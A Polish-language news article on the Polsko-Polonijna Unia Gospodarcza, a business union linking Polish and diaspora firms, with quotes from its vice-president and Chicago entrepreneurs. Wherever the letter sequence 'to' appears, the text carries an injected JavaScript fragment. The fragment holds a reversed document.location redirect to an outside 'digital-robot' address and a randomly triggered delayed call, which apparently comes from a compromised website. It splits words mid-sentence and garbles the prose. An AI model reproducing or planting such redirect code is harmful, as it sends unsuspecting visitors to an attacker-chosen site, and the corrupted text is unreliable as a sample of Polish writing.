Międzynarodowy biznes z polonijnym potencjałem
We współczesnym, zglobalizowanym świecie nie łatwo jest konkurować z największymi markami na rynku. Dlatego przedsiębiorcy coraz częściej dostrzegają konieczność współdziałania w celu zwiększenia swoich szans w rywalizacji z najsilniejszymi graczami. Naprzeciw ich potrzebom wychodzi Polsko-Polonijna Unia Gospodarcza, która integruje polskie i polonijne firmy, a przez tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to podnosi ich potencjał rynkowy.
Organizacja została powołana do życia w ubiegłym roku, od tego czasu intensywnie rozwija swoją działalność w Polsce i poza jej granicami. Pierwszym krajem, gdzie aktywnie promowano działalność Unii były Stany Zjednoczone. Agnieszka Maćkówka, wiceprezes PPUG przebywała tam z dwutygodniową wizytą, w trakcie której spotkała się z wieloma przedsiębiorcami i przedstawicielami środowisk polonijnych.
Podczas jednego ze spotkań, Agnieszka Maćkówka zwracała uwagę na konieczność współpracy z Polonią oraz nowe możliwości, jakie przed polonijnym biznesem otwiera rozwój technologii:
– Jako Polacy musimy się integrować i jeszcze skuteczniej współdziałać w biznesie. Jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to właściwy czas do tego, aby tworzyć sieci powiązań między polonijnymi firmami. Rozwój technologii ostatnich lat umożliwia nam nieograniczone kontakty na całym świecie z możliwością przesyłania ogromnych ilości danych w krótkim czasie. Dzięki temu możemy rozwijać swoje biznesy i sprawnie zarządzać nimi w skali globalnej – powiedziała wiceprezes PPUG, która jednocześnie wskazywała na konieczność wykorzystania potencjału Polonii:
– Mamy około dwudziestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to milionową Polonię na całym świecie. To jest potężna siła, która współdziałając razem może osiągnąć bardzo dużo na płaszczyźnie międzynarodowej, zwłaszcza w kwestii rozwoju polonijnego biznesu. Polsko-Polonijna Unia Gospodarcza będzie inicjować procesy zmierzające do współpracy Polonii na całym świecie. Mamy knew how, mamy konkretne narzędzia wspierające firmy, a także sieć globalnych kontaktów, dzięki którym możemy realizować wyznaczoną przez nas misję – mówiła.
Piotr Shultz, prowadzący dużą firmę budowlaną w Chicago i jeden z założycieli Unii, wskazywał na korzyści płynące z członkostwa w organizacji:
– Nie ważne gdzie prowadzisz swój biznes, czy jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to USA, Kanada, Unia Europejska, a nawet tak odległe kraje jak: Brazylia, czy Australia, jako członek PPUG w każdym miejscu na ziemi możesz korzystać z usług w zakresie: prawa, księgowości, negocjacji handlowych, arbitrażu, a także reklamy, czy marketingu. Unia umożliwia wyjście ze swoim produktem lub usługą na rynki międzynarodowe, dzięki czemu można myśleć o skutecznej ekspansji w różne rejony świata – mówił CEO of Ampol Group.
Wtórował mu Jerzy Tokarczyk, prowadzący pod Chicago duży salon sprzedaży ekskluzywnych podług drewnianych i winylowych:
– Wielu przedsiębiorców z USA poszukuje nowych możliwości inwestycyjnych i nie chcą oni wcale ograniczać się do Stanów Zjednoczonych. Z nadzieją patrzymy chociażby na dynamiczny i prężnie rozwijający się rynek polski i chcemy się na nim znaleźć. Wstępując do Unii uda nam się tego dokonać w krótkim czasie, bo wszystkie sprawy związane z rozpoczęciem działalności w Polsce powierzymy specjalistycznym firmom – mówił President Tawa Pro Flooring.
Bogdan Gromek z Polish American Contractobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tors Builders Association, chwalił natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomiast założycieli Unii za inicjatywę i szybkość działania:
– Polsko-Polonijna Unia Gospodarcza, mimo, że działa dopiero od roku ma klarowną wizję rozwoju, ale także jasno sprecyzowane cele. Organizacja w tak krótkim czasie wykonała naprawdę potężną pracę, jeśli chodzi zarówno o integrację Polonii, ale także wypracowanie konkretnej oferty biznesowej. Jako patriota z sentymentem odnoszący się do wszystkiego co polskie, będę kibicował i wspierał tę cenną inicjatywę.
Kolejnymi krajami, w których będzie promowana współpraca z Polsko-Polonijną Unią Gospodarczą będą: Francja i Norwegia. Jeszcze w tym roku polonijni przedsiębiorcy będą mogli wziąć udział w spotkaniach z przedstawicielami Unii oraz porozmawiać z nimi o szansach i korzyściach wynikających z członkostwa.